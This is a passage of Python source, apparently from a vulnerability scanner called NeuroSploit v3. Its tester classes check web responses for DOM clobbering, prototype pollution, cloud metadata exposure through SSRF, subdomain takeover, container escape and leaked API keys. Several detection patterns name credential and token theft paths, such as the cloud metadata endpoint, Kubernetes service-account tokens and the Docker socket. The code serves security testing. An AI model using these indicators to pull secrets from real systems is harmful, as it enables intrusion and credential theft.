(r'"(?:password|secret|api_key|token)"\s*:\s*"[^"]+"', "sensitive data"),
(r"(?:backup|dump|export)\s+(?:file|data|database)", "backup files"),
(r"phpinfo\(\)", "PHP info page"),
(r"(?:configuration|config)\s+(?:file|settings)", "configuration page"),
(r"(?:internal|private)\s+(?:api|endpoint|documentation)", "internal docs"),
(r"(?:debug|diagnostic)\s+(?:info|page|console)", "debug page"),
(r"(?:user|customer)\s+(?:list|database|records)", "user records"),
]
for pattern, desc in sensitive_patterns:
if re.search(pattern, response_body, re.IGNORECASE):
return True, 0.8, f"Forced browsing: Restricted content accessible - {desc}"
# Check for restricted URL patterns in payload
restricted_paths = [
"/admin", "/backup", "/config", "/internal",
"/debug", "/private", "/management", "/phpinfo",
"/.git", "/.env", "/wp-admin", "/server-status",
]
if any(path in payload.lower() for path in restricted_paths):
if len(response_body) > 200:
return True, 0.7, "Forced browsing: Restricted URL returned content (200 OK)"
# Check that redirect isn't to the same restricted page (false positive)
if response_status in [301, 302]:
location = response_headers.get("Location", "").lower()
if "login" in location or "signin" in location or "auth" in location:
return False, 0.0, None # Properly redirecting to login
return False, 0.0, None
@@ -148,3 +148,283 @@ class OpenRedirectTester(BaseTester):
return True, 0.7, "Open redirect via JavaScript"
return False, 0.0, None
class DomClobberingTester(BaseTester):
"""Tester for DOM Clobbering vulnerability"""
def __init__(self):
super().__init__()
self.name = "dom_clobbering"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for HTML injection that could override JS variables via DOM clobbering"""
if response_status == 200:
# Check if injected HTML with id/name attributes is reflected
clobber_patterns = [
r'<(?:a|form|img|input|iframe|embed|object)\s+[^>]*(?:id|name)\s*=\s*["\']?(?:' + re.escape(payload.split("=")[0] if "=" in payload else payload) + r')',
r'<a\s+[^>]*id=["\'][^"\']+["\'][^>]*href=["\']',
r'<form\s+[^>]*name=["\'][^"\']+["\']',
]
for pattern in clobber_patterns:
if re.search(pattern, response_body, re.IGNORECASE):
return True, 0.8, "DOM Clobbering: Injected HTML with id/name attribute reflected"
# Check for common clobberable global variables
clobber_targets = [
r'<[^>]+id=["\'](?:location|document|window|self|top|frames|opener|parent)["\']',
r'<[^>]+name=["\'](?:location|document|window|self|top|frames|opener|parent)["\']',
]
for pattern in clobber_targets:
if re.search(pattern, response_body, re.IGNORECASE):
return True, 0.85, "DOM Clobbering: HTML element with JS global variable name injected"
return False, 0.0, None
class PostMessageVulnTester(BaseTester):
"""Tester for postMessage vulnerability (missing origin check)"""
def __init__(self):
super().__init__()
self.name = "postmessage_vuln"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for addEventListener('message') without origin validation"""
if response_status == 200:
# Find message event listeners
message_listener = re.search(
r'addEventListener\s*\(\s*["\']message["\']',
response_body
)
if message_listener:
# Check if origin is NOT validated nearby
# Get surrounding context (500 chars after listener)
listener_pos = message_listener.start()
handler_block = response_body[listener_pos:listener_pos + 500]
origin_checks = [
r'\.origin\s*[!=]==?\s*["\']',
r'event\.origin',
r'e\.origin',
r'msg\.origin',
r'origin\s*===',
]
has_origin_check = any(re.search(p, handler_block) for p in origin_checks)
if not has_origin_check:
return True, 0.85, "postMessage vulnerability: Message listener without origin validation"
else:
# Origin check exists but might be weak
if re.search(r'\.origin\s*[!=]==?\s*["\']["\']', handler_block):
return True, 0.7, "postMessage vulnerability: Origin check appears to be empty string"
# Check for postMessage with wildcard origin
wildcard_post = re.search(
r'\.postMessage\s*\([^)]+,\s*["\']\*["\']',
response_body
)
if wildcard_post:
return True, 0.75, "postMessage vulnerability: postMessage with wildcard '*' target origin"
return False, 0.0, None
class WebsocketHijackTester(BaseTester):
"""Tester for WebSocket Cross-Origin Hijacking"""
def __init__(self):
super().__init__()
self.name = "websocket_hijack"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for WebSocket connections accepting cross-origin requests"""
# WebSocket upgrade accepted (101 Switching Protocols)
if response_status == 101:
# Check if Origin header was sent and accepted
upgrade = response_headers.get("Upgrade", "").lower()
if upgrade == "websocket":
return True, 0.8, "WebSocket hijack: Cross-origin WebSocket upgrade accepted"
# Check for WebSocket endpoint in response without origin validation
if response_status == 200:
ws_patterns = [
r'new\s+WebSocket\s*\(\s*["\']wss?://',
r'ws://[^"\'>\s]+',
r'wss://[^"\'>\s]+',
]
for pattern in ws_patterns:
if re.search(pattern, response_body):
# Check for lack of CORS-like origin checking
if "origin" not in response_body.lower() or context.get("cross_origin_accepted"):
return True, 0.7, "WebSocket hijack: WebSocket endpoint found without apparent origin validation"
# 403 on WebSocket with wrong origin is good (not vulnerable)
if response_status == 403:
return False, 0.0, None
return False, 0.0, None
class PrototypePollutionTester(BaseTester):
"""Tester for JavaScript Prototype Pollution"""
def __init__(self):
super().__init__()
self.name = "prototype_pollution"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for __proto__ pollution indicators"""
if response_status == 200:
# Check if __proto__ payload was processed
proto_indicators = [
r'__proto__',
r'constructor\.prototype',
r'Object\.prototype',
]
# Payload should contain proto pollution attempt
is_proto_payload = any(
ind in payload for ind in ["__proto__", "constructor", "prototype"]
)
if is_proto_payload:
# Check for pollution effect in response
pollution_effects = [
r'"__proto__"\s*:\s*\{',
r'"polluted"\s*:\s*true',
r'"isAdmin"\s*:\s*true',
r'"__proto__":\s*\{[^}]*\}',
]
for pattern in pollution_effects:
if re.search(pattern, response_body, re.IGNORECASE):
return True, 0.85, "Prototype pollution: __proto__ property accepted and reflected"
# Check if server processed the prototype chain modification
if response_status == 200 and "__proto__" in response_body:
return True, 0.7, "Prototype pollution: __proto__ present in server response"
# Check for error indicating proto processing
if re.search(r"(?:cannot|unable to).*(?:merge|assign|extend).*proto", response_body, re.IGNORECASE):
return True, 0.6, "Prototype pollution: Server attempted to process __proto__"
return False, 0.0, None
class CssInjectionTester(BaseTester):
"""Tester for CSS Injection vulnerability"""
def __init__(self):
super().__init__()
self.name = "css_injection"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for CSS code rendered in style context"""
if response_status == 200:
# Check if CSS payload is reflected in style context
css_contexts = [
# Inside <style> tags
r'<style[^>]*>(?:[^<]*?)' + re.escape(payload)[:30].replace("\\", "\\\\"),
# Inside style attribute
r'style\s*=\s*["\'][^"\']*' + re.escape(payload)[:30].replace("\\", "\\\\"),
]
for pattern in css_contexts:
try:
if re.search(pattern, response_body, re.IGNORECASE | re.DOTALL):
return True, 0.85, "CSS injection: Payload reflected in style context"
except re.error:
continue
# Check for common CSS injection payloads reflected
css_attack_patterns = [
r'expression\s*\(',
r'url\s*\(\s*["\']?javascript:',
r'@import\s+["\']?https?://',
r'background:\s*url\s*\(\s*["\']?https?://[^"\')\s]*attacker',
r'behavior:\s*url\s*\(',
r'-moz-binding:\s*url\s*\(',
]
for pattern in css_attack_patterns:
if re.search(pattern, response_body, re.IGNORECASE):
return True, 0.8, "CSS injection: Dangerous CSS property reflected"
return False, 0.0, None
class TabnabbingTester(BaseTester):
"""Tester for Reverse Tabnabbing vulnerability"""
def __init__(self):
super().__init__()
self.name = "tabnabbing"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for target=_blank links without rel=noopener"""
if response_status == 200:
# Find all target=_blank links
blank_links = re.finditer(
r'<a\s+[^>]*target\s*=\s*["\']_blank["\'][^>]*>',
response_body,
re.IGNORECASE
)
vulnerable_count = 0
for match in blank_links:
link_tag = match.group(0)
# Check for rel=noopener or rel=noreferrer
has_protection = re.search(
r'rel\s*=\s*["\'][^"\']*(?:noopener|noreferrer)[^"\']*["\']',
link_tag,
re.IGNORECASE
)
if not has_protection:
vulnerable_count += 1
if vulnerable_count > 0:
confidence = min(0.5 + vulnerable_count * 0.1, 0.8)
return True, confidence, f"Tabnabbing: {vulnerable_count} target=_blank link(s) without rel=noopener/noreferrer"
return False, 0.0, None
@@ -0,0 +1,405 @@
"""
NeuroSploit v3 - Cloud & Supply Chain Vulnerability Testers
Testers for S3 misconfiguration, cloud metadata, subdomain takeover,
vulnerable dependencies, container escape, and serverless misconfiguration.
"""
import re
from typing import Tuple, Dict, Optional
from backend.core.vuln_engine.testers.base_tester import BaseTester
class S3BucketMisconfigTester(BaseTester):
"""Tester for S3 Bucket Misconfiguration vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "s3_bucket_misconfig"
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for S3 bucket listing or misconfiguration"""
# Bucket listing XML response
if re.search(r"<ListBucketResult\s", response_body):
return True, 0.95, "S3 bucket listing enabled - bucket contents exposed"
# Bucket listing with objects
if "<Contents>" in response_body and "<Key>" in response_body:
keys = re.findall(r"<Key>([^<]+)</Key>", response_body)
if keys:
return True, 0.95, f"S3 bucket listing: {len(keys)} objects exposed (e.g., {keys[0][:50]})"
# NoSuchBucket - potential subdomain takeover
if "NoSuchBucket" in response_body:
bucket_match = re.search(r"<BucketName>([^<]+)</BucketName>", response_body)
bucket_name = bucket_match.group(1) if bucket_match else "unknown"
return True, 0.8, f"S3 bucket '{bucket_name}' does not exist - potential takeover"
# AccessDenied with bucket info
if "AccessDenied" in response_body and "s3.amazonaws.com" in response_body:
return True, 0.5, "S3 bucket exists but access denied - bucket enumerated"
# Public write/upload success
if response_status in [200, 204] and context.get("is_upload_test"):
headers_lower = {k.lower(): v for k, v in response_headers.items()}
if "x-amz-request-id" in headers_lower:
return True, 0.9, "S3 bucket allows public write access"
# Bucket policy exposed
if '"Statement"' in response_body and '"Effect"' in response_body:
if '"s3:' in response_body:
return True, 0.85, "S3 bucket policy exposed"
return False, 0.0, None
class CloudMetadataExposureTester(BaseTester):
"""Tester for Cloud Metadata Exposure vulnerabilities (SSRF to metadata)"""
def __init__(self):
super().__init__()
self.name = "cloud_metadata_exposure"
self.metadata_indicators = {
# AWS
"aws": [
(r"ami-[0-9a-f]{8,17}", "AWS AMI ID"),
(r"i-[0-9a-f]{8,17}", "AWS Instance ID"),
(r"arn:aws:[a-z0-9-]+:[a-z0-9-]*:\d{12}:", "AWS ARN"),
(r"AKIA[0-9A-Z]{16}", "AWS Access Key"),
(r"169\.254\.169\.254", "AWS metadata endpoint"),
(r"\"(?:AccessKeyId|SecretAccessKey|Token)\"", "AWS IAM credentials"),
(r"ec2\.internal", "AWS internal hostname"),
(r"\"accountId\"\s*:\s*\"\d{12}\"", "AWS Account ID"),
],
# GCP
"gcp": [
(r"projects/\d+/", "GCP Project reference"),
(r"metadata\.google\.internal", "GCP metadata endpoint"),
(r"\"access_token\"\s*:\s*\"ya29\.", "GCP OAuth token"),
(r"compute\.googleapis\.com", "GCP Compute API"),
(r"serviceAccounts/[^/]+/token", "GCP service account token"),
],
# Azure
"azure": [
(r"metadata\.azure\.com", "Azure metadata endpoint"),
(r"(?:subscriptionId|resourceGroupName)\"\s*:\s*\"", "Azure resource info"),
(r"\.blob\.core\.windows\.net", "Azure Blob Storage"),
(r"\.vault\.azure\.net", "Azure Key Vault"),
(r"\"access_token\"\s*:\s*\"eyJ", "Azure JWT token"),
],
}
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for cloud metadata in response"""
findings = []
for provider, patterns in self.metadata_indicators.items():
for pattern, description in patterns:
if re.search(pattern, response_body):
findings.append(f"{provider.upper()}: {description}")
if findings:
# IAM credentials or tokens are critical
critical = any(k in f for f in findings for k in ["credentials", "Access Key", "token", "Token"])
confidence = 0.95 if critical else 0.8
return True, confidence, f"Cloud metadata exposure: {', '.join(findings[:3])}"
# Check for metadata endpoint access (SSRF to cloud metadata)
metadata_urls = ["169.254.169.254", "metadata.google.internal",
"metadata.azure.com", "100.100.100.200"]
for url in metadata_urls:
if url in payload and response_status == 200 and len(response_body) > 50:
return True, 0.85, f"Cloud metadata accessible via SSRF ({url})"
return False, 0.0, None
class SubdomainTakeoverTester(BaseTester):
"""Tester for Subdomain Takeover vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "subdomain_takeover"
self.takeover_fingerprints = [
# AWS S3
(r"NoSuchBucket", "S3 bucket - NoSuchBucket"),
(r"The specified bucket does not exist", "S3 bucket does not exist"),
# GitHub Pages
(r"There isn't a GitHub Pages site here", "GitHub Pages - unclaimed"),
(r"For root URLs.*GitHub Pages", "GitHub Pages not configured"),
# Heroku
(r"No such app", "Heroku - app not found"),
(r"herokucdn\.com/error-pages/no-such-app", "Heroku - no such app"),
# Shopify
(r"Sorry, this shop is currently unavailable", "Shopify - shop unavailable"),
# Tumblr
(r"There's nothing here\.", "Tumblr - unclaimed"),
(r"Whatever you were looking for doesn't currently exist", "Tumblr not found"),
# WordPress.com
(r"Do you want to register.*wordpress\.com", "WordPress.com - unclaimed"),
# Azure
(r"404 Web Site not found", "Azure - web app not found"),
# Fastly
(r"Fastly error: unknown domain", "Fastly - unknown domain"),
# Pantheon
(r"404 error unknown site", "Pantheon - unknown site"),
# Zendesk
(r"Help Center Closed", "Zendesk - closed"),
# Unbounce
(r"The requested URL was not found on this server.*unbounce", "Unbounce - not found"),
# Surge.sh
(r"project not found", "Surge.sh - not found"),
# Fly.io
(r"404.*fly\.io", "Fly.io - not found"),
]
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for cloud provider error pages indicating takeover opportunity"""
for pattern, description in self.takeover_fingerprints:
if re.search(pattern, response_body, re.IGNORECASE):
return True, 0.9, f"Subdomain takeover: {description}"
# CNAME pointing to unclaimed resource
if context.get("cname_target"):
cname = context["cname_target"]
unclaimed_domains = [
".s3.amazonaws.com", ".herokuapp.com", ".github.io",
".azurewebsites.net", ".cloudfront.net", ".fastly.net",
".ghost.io", ".myshopify.com", ".surge.sh",
]
for domain in unclaimed_domains:
if cname.endswith(domain) and response_status in [404, 0]:
return True, 0.85, f"Subdomain takeover: CNAME to {cname} returns {response_status}"
# NXDOMAIN with CNAME
if context.get("dns_nxdomain") and context.get("has_cname"):
return True, 0.8, "Subdomain takeover: CNAME exists but target domain is NXDOMAIN"
return False, 0.0, None
class VulnerableDependencyTester(BaseTester):
"""Tester for Vulnerable Dependency detection"""
def __init__(self):
super().__init__()
self.name = "vulnerable_dependency"
self.vulnerable_libs = [
# JavaScript
(r"jquery[/.-](?:1\.\d+|2\.\d+|3\.[0-4]\.\d+)", "jQuery < 3.5.0 (XSS)"),
(r"angular[/.-]1\.[0-5]\.\d+", "AngularJS < 1.6 (sandbox escape)"),
(r"lodash[/.-](?:[0-3]\.\d+|4\.(?:1[0-6]|[0-9])\.\d+)", "Lodash < 4.17.21 (prototype pollution)"),
(r"bootstrap[/.-](?:[1-3]\.\d+|4\.[0-3]\.\d+)", "Bootstrap < 4.3.1 (XSS)"),
(r"moment[/.-](?:[01]\.\d+|2\.(?:[0-9]|1[0-8])\.\d+)", "Moment.js < 2.19.3 (ReDoS)"),
(r"handlebars[/.-](?:[0-3]\.\d+|4\.[0-6]\.\d+)", "Handlebars < 4.7.7 (prototype pollution)"),
# Python
(r"Django[/=](?:1\.\d+|2\.[01]\.\d+|3\.0\.\d+)", "Django < 3.1 (multiple CVEs)"),
(r"Flask[/=](?:0\.\d+|1\.[01]\.\d+)", "Flask < 2.0 (known issues)"),
(r"requests[/=]2\.(?:[0-9]|1\d|2[0-4])\.\d+", "Requests < 2.25 (CVE-2023-32681)"),
# Java
(r"log4j[/-]2\.(?:[0-9]|1[0-4])\.\d+", "Log4j < 2.15 (Log4Shell CVE-2021-44228)"),
(r"spring-core[/-](?:[1-4]\.\d+|5\.[0-2]\.\d+)", "Spring < 5.3 (Spring4Shell)"),
(r"jackson-databind[/-]2\.(?:[0-8]|9\.[0-9])\.\d*", "Jackson < 2.9.10 (deserialization)"),
# PHP
(r"laravel/framework[/:]\s*v?(?:[1-7]\.\d+|8\.[0-7]\d)", "Laravel < 8.80 (known issues)"),
]
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for known vulnerable library version strings"""
findings = []
# Check response body (JS files, package.json, error pages)
for pattern, description in self.vulnerable_libs:
match = re.search(pattern, response_body, re.IGNORECASE)
if match:
findings.append(f"{match.group(0)} - {description}")
# Check headers for version info
headers_str = "\n".join(f"{k}: {v}" for k, v in response_headers.items())
for pattern, description in self.vulnerable_libs:
match = re.search(pattern, headers_str, re.IGNORECASE)
if match and description not in str(findings):
findings.append(f"{match.group(0)} - {description}")
if findings:
# Log4Shell and Spring4Shell are critical
critical = any(k in f for f in findings for k in ["Log4Shell", "Spring4Shell", "deserialization"])
confidence = 0.9 if critical else 0.75
return True, confidence, f"Vulnerable dependency: {'; '.join(findings[:3])}"
return False, 0.0, None
class ContainerEscapeTester(BaseTester):
"""Tester for Container Escape / Container Misconfiguration vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "container_escape"
self.container_indicators = [
# Docker
(r"\.dockerenv", "Docker environment file accessible"),
(r"docker\.sock", "Docker socket exposed"),
(r"/var/run/docker\.sock", "Docker socket path"),
# Cgroup
(r"docker[/-][0-9a-f]{12,64}", "Docker container cgroup"),
(r"/proc/self/cgroup.*docker", "Docker cgroup detected"),
(r"/proc/self/cgroup.*kubepods", "Kubernetes pod cgroup"),
# Kubernetes
(r"KUBERNETES_SERVICE_HOST", "Kubernetes service host env"),
(r"KUBERNETES_PORT", "Kubernetes port env"),
(r"/var/run/secrets/kubernetes\.io", "Kubernetes secrets path"),
(r"serviceaccount/token", "Kubernetes service account token"),
(r"kube-system", "Kubernetes system namespace"),
# Container runtime
(r"containerd", "containerd runtime"),
(r"runc", "runc runtime"),
# Process namespace
(r"process\s+1\b.*(?:init|systemd|tini|dumb-init)", "Container init process"),
]
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for Docker/container indicators in response"""
findings = []
for pattern, description in self.container_indicators:
if re.search(pattern, response_body, re.IGNORECASE):
findings.append(description)
if findings:
# Docker socket or K8s secrets are critical
critical = any(k in f for f in findings for k in ["socket", "secrets", "token"])
confidence = 0.9 if critical else 0.7
return True, confidence, f"Container exposure: {', '.join(findings[:3])}"
# Privileged container detection
if context.get("is_capability_check"):
# Check for extra capabilities
cap_patterns = [
r"cap_sys_admin", r"cap_sys_ptrace", r"cap_net_admin",
r"cap_dac_override", r"cap_sys_rawio",
]
for pattern in cap_patterns:
if re.search(pattern, response_body, re.IGNORECASE):
return True, 0.8, f"Privileged container: {pattern} capability detected"
# Mount namespace check
if re.search(r"/dev/(?:sda|xvda|nvme)\d*\s", response_body):
return True, 0.6, "Host block devices visible from container"
return False, 0.0, None
class ServerlessMisconfigTester(BaseTester):
"""Tester for Serverless Misconfiguration vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "serverless_misconfig"
self.env_patterns = [
# AWS Lambda
(r"AWS_LAMBDA_FUNCTION_NAME\s*[=:]\s*(\S+)", "Lambda function name"),
(r"AWS_SECRET_ACCESS_KEY\s*[=:]\s*(\S+)", "Lambda AWS secret key"),
(r"AWS_SESSION_TOKEN\s*[=:]\s*(\S+)", "Lambda session token"),
(r"AWS_LAMBDA_LOG_GROUP_NAME", "Lambda log group"),
(r"_HANDLER\s*[=:]\s*(\S+)", "Lambda handler path"),
(r"LAMBDA_TASK_ROOT\s*[=:]\s*(\S+)", "Lambda task root"),
(r"AWS_EXECUTION_ENV\s*[=:]\s*(\S+)", "Lambda execution environment"),
# Google Cloud Functions
(r"FUNCTION_NAME\s*[=:]\s*(\S+)", "Cloud Function name"),
(r"GCLOUD_PROJECT\s*[=:]\s*(\S+)", "GCP project ID"),
(r"GOOGLE_CLOUD_PROJECT\s*[=:]\s*(\S+)", "GCP project"),
(r"GCP_PROJECT\s*[=:]\s*(\S+)", "GCP project"),
(r"FUNCTION_REGION\s*[=:]\s*(\S+)", "Cloud Function region"),
# Azure Functions
(r"FUNCTIONS_WORKER_RUNTIME\s*[=:]\s*(\S+)", "Azure Function runtime"),
(r"AzureWebJobsStorage\s*[=:]\s*(\S+)", "Azure storage connection string"),
(r"WEBSITE_SITE_NAME\s*[=:]\s*(\S+)", "Azure site name"),
]
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for serverless environment variable exposure"""
findings = []
for pattern, description in self.env_patterns:
match = re.search(pattern, response_body)
if match:
value = match.group(1) if match.lastindex else ""
# Redact sensitive values
if "key" in description.lower() or "token" in description.lower() or "secret" in description.lower():
display = f"{description} (REDACTED)"
else:
display = f"{description}: {value[:30]}"
findings.append(display)
if findings:
# Credentials are critical
critical = any(k in f for f in findings for k in ["secret", "token", "REDACTED"])
confidence = 0.95 if critical else 0.75
return True, confidence, f"Serverless misconfiguration: {', '.join(findings[:3])}"
# Function source code exposure
if context.get("is_source_request"):
source_indicators = [
r"exports\.handler\s*=", r"def lambda_handler\(",
r"def main\(req:", r"module\.exports",
r"def hello_http\(request\):",
]
for pattern in source_indicators:
if re.search(pattern, response_body):
return True, 0.8, "Serverless misconfiguration: function source code exposed"
# Invocation error details
error_patterns = [
r"\"errorType\"\s*:\s*\"(\w+)\"",
r"\"stackTrace\"\s*:\s*\[",
r"Runtime\.HandlerNotFound",
r"\"errorMessage\"\s*:\s*\".*(?:import|require|module)",
]
for pattern in error_patterns:
match = re.search(pattern, response_body)
if match:
return True, 0.7, f"Serverless misconfiguration: detailed error exposed ({match.group(0)[:60]})"
return False, 0.0, None
@@ -0,0 +1,388 @@
"""
NeuroSploit v3 - Data Exposure Vulnerability Testers
Testers for sensitive data exposure, information disclosure, API key exposure,
source code disclosure, backup file exposure, and version disclosure.
"""
import re
from typing import Tuple, Dict, Optional
from backend.core.vuln_engine.testers.base_tester import BaseTester
class SensitiveDataExposureTester(BaseTester):
"""Tester for Sensitive Data Exposure (PII leakage)"""
def __init__(self):
super().__init__()
self.name = "sensitive_data_exposure"
self.pii_patterns = [
# SSN (US)
(r"\b\d{3}-\d{2}-\d{4}\b", "SSN pattern"),
# Credit card numbers (Visa, MC, Amex, Discover)
(r"\b4\d{3}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}\b", "Visa card number"),
(r"\b5[1-5]\d{2}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}\b", "MasterCard number"),
(r"\b3[47]\d{2}[\s-]?\d{6}[\s-]?\d{5}\b", "Amex card number"),
(r"\b6(?:011|5\d{2})[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}\b", "Discover card number"),
# Email addresses in bulk (10+ suggests a data leak)
(r"[\w.+-]+@[\w-]+\.[\w.-]+", "email address"),
# Phone numbers (US format)
(r"\b\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}\b", "phone number"),
# Passport numbers
(r"\b[A-Z]\d{8}\b", "passport number pattern"),
# Private keys
(r"-----BEGIN (?:RSA |EC |DSA )?PRIVATE KEY-----", "private key"),
# Password hashes
(r"\$2[aby]?\$\d{1,2}\$[./A-Za-z0-9]{53}", "bcrypt hash"),
(r"\b[a-f0-9]{32}\b", "MD5 hash"),
]
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for PII patterns in response"""
if response_status >= 400:
return False, 0.0, None
findings = []
for pattern, description in self.pii_patterns:
matches = re.findall(pattern, response_body)
if matches:
# Private keys and password hashes are always significant
if "private key" in description:
return True, 0.95, f"Sensitive data exposure: {description} found in response"
if "bcrypt hash" in description:
return True, 0.9, f"Sensitive data exposure: {description} found in response"
# For patterns like emails, phone numbers - check for bulk exposure
if description in ["email address", "phone number"]:
if len(matches) >= 5:
findings.append(f"{len(matches)} {description}s")
elif description == "MD5 hash":
if len(matches) >= 3:
findings.append(f"{len(matches)} {description}es")
else:
findings.append(f"{description} ({matches[0][:20]}...)")
if findings:
confidence = min(0.9, 0.6 + 0.1 * len(findings))
return True, confidence, f"Sensitive data exposure: {', '.join(findings[:3])}"
return False, 0.0, None
class InformationDisclosureTester(BaseTester):
"""Tester for Information Disclosure vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "information_disclosure"
self.disclosure_patterns = [
# Server version headers
(r"Server:\s*(.+)", "header", "Server version"),
(r"X-Powered-By:\s*(.+)", "header", "Technology stack"),
(r"X-AspNet-Version:\s*(.+)", "header", "ASP.NET version"),
(r"X-AspNetMvc-Version:\s*(.+)", "header", "ASP.NET MVC version"),
]
self.body_patterns = [
# Path disclosure
(r"(?:/var/www|/home/\w+|/srv/|/opt/\w+|C:\\inetpub|C:\\Users\\\w+)[/\\]\S+", "Internal path"),
# Stack traces
(r"Traceback \(most recent call last\)", "Python stack trace"),
(r"at \w+\.\w+\([\w.]+:\d+\)", "Java stack trace"),
(r"(?:Fatal error|Warning|Notice):\s+.*\sin\s+/\S+\s+on line \d+", "PHP error with path"),
(r"Microsoft \.NET Framework Version:\d+", ".NET framework version"),
# Database info
(r"(?:MySQL|PostgreSQL|Oracle|MSSQL)\s+\d+\.\d+", "Database version"),
# Debug info
(r"(?:DEBUG|TRACE)\s*=\s*(?:true|True|1)", "Debug mode enabled"),
(r"(?:SECRET_KEY|DB_PASSWORD|API_SECRET)\s*[=:]\s*\S+", "Secret in debug output"),
# Internal IPs
(r"\b(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})\b", "Internal IP address"),
]
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for information disclosure in headers and body"""
findings = []
# Check headers
headers_str = "\n".join(f"{k}: {v}" for k, v in response_headers.items())
for pattern, location, description in self.disclosure_patterns:
match = re.search(pattern, headers_str, re.IGNORECASE)
if match:
findings.append(f"{description}: {match.group(1)[:50]}")
# Check body
for pattern, description in self.body_patterns:
match = re.search(pattern, response_body, re.IGNORECASE)
if match:
findings.append(f"{description}: {match.group(0)[:80]}")
if findings:
# Stack traces and secrets are higher severity
high_severity = any("stack trace" in f.lower() or "secret" in f.lower() or "debug" in f.lower() for f in findings)
confidence = 0.85 if high_severity else 0.7
return True, confidence, f"Information disclosure: {'; '.join(findings[:3])}"
return False, 0.0, None
class ApiKeyExposureTester(BaseTester):
"""Tester for API Key Exposure vulnerabilities"""
def __init__(self):
super().__init__()
self.name = "api_key_exposure"
self.key_patterns = [
# AWS
(r"AKIA[0-9A-Z]{16}", "AWS Access Key"),
(r"(?:aws_secret_access_key|AWS_SECRET_ACCESS_KEY)\s*[=:]\s*[A-Za-z0-9/+=]{40}", "AWS Secret Key"),
# Google
(r"AIza[0-9A-Za-z\-_]{35}", "Google API Key"),
(r"ya29\.[0-9A-Za-z\-_]+", "Google OAuth Token"),
# Stripe
(r"sk_live_[0-9a-zA-Z]{24,}", "Stripe Secret Key"),
(r"pk_live_[0-9a-zA-Z]{24,}", "Stripe Publishable Key"),
(r"rk_live_[0-9a-zA-Z]{24,}", "Stripe Restricted Key"),
# GitHub
(r"gh[pousr]_[A-Za-z0-9_]{36,}", "GitHub Token"),
# Slack
(r"xox[baprs]-[0-9]{10,13}-[0-9]{10,13}[a-zA-Z0-9-]*", "Slack Token"),
# Twilio
(r"SK[0-9a-fA-F]{32}", "Twilio API Key"),
# SendGrid
(r"SG\.[a-zA-Z0-9_-]{22}\.[a-zA-Z0-9_-]{43}", "SendGrid API Key"),
# Heroku
(r"[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}", "Heroku API Key / UUID"),
# Generic patterns
(r"(?:api[_-]?key|apikey|api[_-]?secret)\s*[=:]\s*['\"]?([A-Za-z0-9_\-]{20,})['\"]?", "Generic API Key"),
(r"(?:access[_-]?token|auth[_-]?token)\s*[=:]\s*['\"]?([A-Za-z0-9_\-.]{20,})['\"]?", "Access Token"),
# Bearer tokens in JS
(r"['\"]Bearer\s+[A-Za-z0-9_\-\.]{20,}['\"]", "Hardcoded Bearer Token"),
]
def analyze_response(
self,
payload: str,
response_status: int,
response_headers: Dict,
response_body: str,
context: Dict
) -> Tuple[bool, float, Optional[str]]:
"""Check for API key patterns in response"""
findings = []
for pattern, description in self.key_patterns:
matches = re.findall(pattern, response_body)
if matches:
# Skip UUIDs unless in specific context (too many false positives)
if "UUID" in description:
continue
# Redact the actual key in evidence
sample = matches[0] if isinstance(matches[0], str) else matches[0]
redacted = sample[:8] + "..." + sample[-4:] if len(sample) > 12 else sample[:4] + "..."
findings.append(f"{description} ({redacted})")
if findings:
# AWS/Stripe secret keys are critical
critical = any(k in f for f in findings for k in ["AWS Secret", "Stripe Secret", "Secret Key"])
confidence = 0.95 if critical else 0.85
return True, confidence, f"API key exposure: {', '.join(findings[:3])}"
return False, 0.0, None
class SourceCodeDisclosureTester(BaseTester):
"""Tester for Source Code Disclosure vulnerabilities"""
def __init__(self):
super().__init__()
